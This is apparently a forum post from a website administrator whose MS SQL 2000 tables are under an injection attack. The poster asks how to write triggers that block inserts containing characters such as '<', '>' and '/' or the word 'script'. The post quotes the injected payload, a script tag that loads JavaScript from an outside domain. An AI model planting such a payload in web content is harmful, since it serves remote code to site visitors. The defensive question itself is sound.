trigger in msSQL2000 tables to stop input, update with specific characters.
client site is under severe data injection attack and have stoped by blocking all write access to the 4 tables under attack. this works ok for now but these tables need to be updated.
the injection is appx this: </title><script src='http://google-anxxxxx.info/urcxxx.js'></script>
what i want to do is in tables that have no url/email data is stop write if data contains <, >, / and maybe "script" or some other text.
if the table contains url/email data, stop entry with "</table>" or some such.
no the data is not being posted thru site search or other formsets. this is what i first thought so wrote CF to detect and block to no avail. also have perused the site for "special" page with formsets they could use. no there too. think is some very vicious bot and is coming from russia!!!
tnx in advance.
